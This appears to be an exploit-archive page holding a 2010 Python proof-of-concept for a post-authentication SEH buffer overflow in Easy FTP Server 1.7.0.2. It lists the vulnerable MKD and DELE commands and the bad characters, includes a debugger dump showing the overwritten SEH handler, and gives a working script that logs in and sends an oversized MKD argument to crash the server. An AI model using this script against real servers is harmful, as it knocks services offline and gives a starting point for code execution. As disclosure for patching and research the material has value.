Easy FTP Server 1.7.0.2 Post Authentication SEH

Easy FTP Server 1.7.0.2 Post Authentication SEH: Posted Feb 16, 2010; Authored by loneferret; Easy FTP Server version 1.7.0.2 post authentication SEH buffer overflow exploit.; tags | exploit, overflow; SHA-256 | 0b7f7d789a29c9c25267690aefa27462cd6509550647250e689ba0a6401bd1e8; Download | Favorite | View

Easy FTP Server 1.7.0.2 Post Authentication SEH

#!/usr/bin/python
 
# Title: Easy~Ftp Server v1.7.0.2 Post-Authentication BoF (SEH) (PoC)
# From: The eh?-Team || The Great White Fuzz (we're not sure yet)
# Found by: loneferret
# Hat's off to dookie2000ca
# Date Found: 13/02/2010
# Developer contacted: 14/02/2010
# Software link: http://cdnetworks-us-2.dl.sourceforge.net/project/easyftpsvr/easyftpsvr/1.7.0.2-en/easyftpsvr-1.7.0.2.zip
# Tested on: Windows XP SP2/SP3 Professional
# Nod to the Exploit-DB Team
 
# Vulnerable commands: MKD / DELE
# badchars: \x00 \x0a \x2f \x5c
 
#SEH chain of thread 000001D8, item 0
# Address=0081FC60
# SE handler=41414141
 
 
 
#EAX 41414141
#ECX 0081FCCC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....
#EDX 005F3958
#EBX 00000000
#ESP 0081FB14
#EBP 00000000
#ESI 0081FCCC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....
#EDI 00000000
#EIP 0040BFDC ftpbasic.0040BFDC
#C 0 ES 0023 32bit 0(FFFFFFFF)
#P 1 CS 001B 32bit 0(FFFFFFFF)
#A 0 SS 0023 32bit 0(FFFFFFFF)
#Z 0 DS 0023 32bit 0(FFFFFFFF)
#S 0 FS 003B 32bit 7FFDD000(FFF)
#T 0 GS 0000 NULL
#D 0
#O 0 LastErr ERROR_INVALID_PARAMETER (00000057)
#EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
#ST0 empty %#.19L
#ST1 empty +UNORM 03E9 00000000 00000000
#ST2 empty 0.0
#ST3 empty 0.0
#ST4 empty -UNORM FAB4 00000000 00000002
#ST5 empty +UNORM 09B8 00000011 7C910732
#ST6 empty %#.19L
#ST7 empty -??? FFFF 7C910738 7C90EE18
# 3 2 1 0 E S P U O Z D I
#FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
#FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
 
 
import socket
 
 
buffer = "\x41" * 505
 
 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('xxx.xxx.xxx.xxx',21))
s.recv(1024)
s.send('USER test\r\n')
s.recv(1024)
s.send('PASS test\r\n')
s.recv(1024)
s.send('MKD ' + buffer + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close

Top Authors In Last 30 Days

Red Hat 207 files
Ubuntu 98 files
Debian 18 files
indoushka 18 files
Gentoo 14 files
Google Security Research 13 files
CraCkEr 9 files
Mirabbas Agalarov 9 files
Apple 8 files
nu11secur1ty 7 files

File Archives

Systems

AIX (428)
Apple (1,979)
BSD (373)
CentOS (57)
Cisco (1,920)
Debian (6,753)
Fedora (1,691)
FreeBSD (1,244)
Gentoo (4,321)
HPUX (879)
iOS (344)
iPhone (108)
IRIX (220)
Juniper (67)
Linux (45,783)
Mac OS X (685)
Mandriva (3,105)
NetBSD (256)
OpenBSD (482)
RedHat (13,311)
Slackware (941)
Solaris (1,610)
SUSE (1,444)
Ubuntu (8,633)
UNIX (9,237)
UnixWare (186)
Windows (6,555)
Other

Easy FTP Server 1.7.0.2 Post Authentication SEH

Easy FTP Server 1.7.0.2 Post Authentication SEH

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Easy FTP Server 1.7.0.2 Post Authentication SEH

Share This

Easy FTP Server 1.7.0.2 Post Authentication SEH

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems